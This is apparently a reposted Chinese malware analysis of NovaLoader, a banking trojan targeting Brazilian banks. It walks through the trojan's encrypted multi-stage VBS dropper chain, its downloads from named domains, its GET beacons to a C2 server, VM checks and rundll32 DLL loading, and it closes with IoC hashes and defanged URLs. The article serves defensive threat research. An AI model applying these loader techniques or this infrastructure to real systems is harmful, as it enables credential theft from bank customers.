导航：首页 > 网络安全 >

NovaLoader是一款什么软件

发表于：2024-09-22 作者：千家信息网编辑

千家信息网最后更新 2024年09月22日，这篇文章将为大家详细讲解有关NovaLoader是一款什么软件，小编觉得挺实用的，因此分享给大家做个参考，希望大家阅读完这篇文章后可以有所收获。近期，研究人员检测到了一个非常有趣的针对巴西银行的恶意软

千家信息网最后更新 2024年09月22日NovaLoader是一款什么软件

这篇文章将为大家详细讲解有关NovaLoader是一款什么软件，小编觉得挺实用的，因此分享给大家做个参考，希望大家阅读完这篇文章后可以有所收获。

近期，研究人员检测到了一个非常有趣的针对巴西银行的恶意软件活动。这款恶意软件名叫NovaLoader，采用Delphi开发，并且使用了Visual Basic Script（VBS）脚本语言来扩展其他功能。虽然最终的Payload不算新颖，而且也有很多研究人员已经研究过了，但我们这一次发现的多阶段Payload传播却是之前没有出现过的。

传播方法

在之前的样本中，这款恶意软件所采用的传播方法包括垃圾邮件、社工活动以及钓鱼网站等等。攻击者使用了各种参数和选项来确保恶意软件的传播，并尝试绕过安全防护产品的检测。一般来说，他们主要利用的都是热门的合法服务，比如说Dropbox、GitHub、Pastebin、AWS以及GitLab等等，而且还会使用类似No-IP和DynDNS等动态DNS服务。

根据研究人员的分析，NovaLoader在其感染链中使用了Autolt、PowerShell和Batch脚本，但这是我们首次发现它竟然还使用了VBS。除此之外，在此次攻击活动中，它还使用了加密脚本，而不像之前那样只是对脚本代码进行了混淆处理。

主Dropper

MD5：4ef89349a52f9fcf9a139736e236217e

这款恶意软件的主Dropper比较简单：它唯一的作用就是解密嵌入其中的VB脚本，并运行解密后的脚本：

第一阶段脚本

下图为嵌入脚本解密前和解密后的代码。

这个VBS文件将会解密一个URL地址(dwosgraumellsa[.]club/cabaco2.txt)，并下载另一个加密脚本，然后在该脚本解密后运行脚本：

第二阶段脚本

下载下来的VB脚本解密后的部分代码段如下所示：

VB脚本会向"http://54.95.36[.]242/contaw.php"发送一个GET请求，很可能是为了让远程C2服务器知道它已经成功在目标系统上运行了。接下来，它会尝试使用WMI查询并检测当前是否为虚拟机环境：

NovaLoader将会把下面这些可执行文件拷贝到目录"C:\\Users\\Public\\"中：

C:\\Windows\\(system32|SysWOW64)\\rundll32.exeC:\\Windows\\(system32|SysWOW64)\\Magnification.dll

接下来，它会从以下地址下载一些依赖文件：

32atendimentodwosgraumell[.]club32atendimentodwosgraumell[.]club/mi5a.php文件在解密之后会存储到"C:\Users\Public\{random}4.zip"。32atendimentodwosgraumell[.]club/mi5a1.zip文件会存储为"C:\Users\Public\{random}1.zip"。32atendimentodwosgraumell[.]club/mi5asq.zip文件的存储路径为"C:\Users\Public\{random}sq.zip"。

然后它会向"54.95.36.242/contaw{1-7}.php"发送多个GET请求：

GET/contaw.phpGET/contaw2.php?w={redacted}BIT-PC_Microsoft%20Windows%207%20Professional%20_TrueGET/contaw3.php?w={redacted}BIT-PCGET/contaw4.php?w={redacted}BIT-PCGET/contaw5.php?w={redacted}BIT-PCGET/contaw6.php?w={redacted}BIT-PC_2/1/2019%205:05:06%20PMGET/contaw7.php?w={redacted}BIT-PC_2/1/2019%205:05:06%20PM_CD=414KbCD1=9160Kb_

除此之外，它还会向"C:\Users\Public\"目录存储多个恶意文件：

最后，它将会使用拷贝过来的rundll32.exe文件来解密DLL并导出功能函数：

第三阶段的Payload是一个DLL文件，它将作为最终阶段Payload的加载器。它通过rundll32.exe运行，主要功能就是解密和加载最终阶段的Payload。

最终Payload

最终阶段的Payload采用Delphi开发，并且包含用户凭证窃取（针对各大巴西银行）在内等多种功能。而且它还会监控浏览器窗口的标题，如果检测到了匹配的巴西银行名称，恶意软件将会控制目标系统并与恶意C2服务器建立连接，然后阻止用户访问真正的银行网银页面，并在后台进行恶意操作。

恶意软件所使用的部分命令如下：

恶意软件中跟银行有关的部分字符串如下：

入侵威胁指标IoC

MD5：

60e5f9fe1b778b4dc928f9d4067b470b4ef89349a52f9fcf9a139736e236217e100ff8b5eeed3fba85a1f64db319ff4099471d4f03fb5ac5a409a79100cd9349cb2ef5d8a227442d0156de82de526b30a16273279d6fe8fa12f37c57345d42f7ac4152492e9a2c4ed1ff359ee7e990d1fdace867e070df4bf3bdb1ed0dbdb51c4d5d1dfb84ef69f7c47c68e730ec1fb76bf65db5511b06749711235566a6b438c5a573d622750973d90af054a09ab8ddef5f2fd7b0262a5aecc32e879890fb4035803b81efc043691094534662e1351c34340c9045d665b800fcdb8c265eebeca71e09796fb9f8527afdfdd29c7277875a9f779b9cb2b091c9c1eff32b1f9754a7117788259030538601e8020035867ecb9f95cec3debc96ddc1773f6c681d8c a7722ea1ca64fcd7b7ae2d7c86f13013

URL：

185[.]141[.]195[.]5/prt1.txt185[.]141[.]195[.]81/prt3.txt185[.]141[.]195[.]74/prt1.txtdwosgraumellsa[.]club/cabaco2.txtwn5zweb[.]online/works1.txt23[.]94[.]243[.]101/vdb1.txt167[.]114[.]31[.]95/gdo1.txt 167[.]114[.]31[.]93/gdo1.txt

关于"NovaLoader是一款什么软件"这篇文章就分享到这里了，希望以上内容可以对大家有一定的帮助，使各位可以学到更多知识，如果觉得文章不错，请把它分享出去让更多的人看到。

很赞哦！